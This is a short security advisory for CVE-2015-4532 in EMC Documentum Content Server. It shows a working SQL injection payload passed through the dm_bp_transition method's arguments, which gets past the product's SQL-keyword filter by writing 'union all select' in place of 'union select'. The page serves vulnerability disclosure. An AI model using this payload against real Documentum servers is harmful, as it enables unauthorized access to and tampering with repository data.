EMC Documentum Content Server Code Execution

2015.08.19
Credit: Andrey B. Panfilov
Risk: Medium
Local: Yes
Remote: No
CVE: CVE-2015-4532
CWE: N/A


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

Product: EMC Documentum Content Server Vendor: EMC Version: ANY CVE: N/A Risk: High Status: public/not fixed For detailed description see http://seclists.org/bugtraq/2015/Jul/51 New behavior introduced in CVE-2015-4532: API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS=' repo repo dmadmin "" 0000000000000000 0000000000000000 0000000000000000 "0801fd08805c9dfe,'' union select r_object_id from dm_sysobject where r_object_id=''0801fd08805c9dfe" 0000000000000000 0000000000000000 0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000' [DM_METHOD_E_METHOD_ARGS_INVALID]error: "The arguments being passed to the method 'dm_bp_transition' are invalid: arguments contain sql keywords which are not allowed." New attack vector (note ALL keyword): API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS=' repo repo dmadmin "" 0000000000000000 0000000000000000 0000000000000000 "0801fd08805c9dfe,'' union all select r_object_id from dm_sysobject where r_object_id=''0801fd08805c9dfe" 0000000000000000 0000000000000000 0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000' __ Regards, Andrey B. Panfilov

References:

http://seclists.org/bugtraq/2015/Jul/51


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top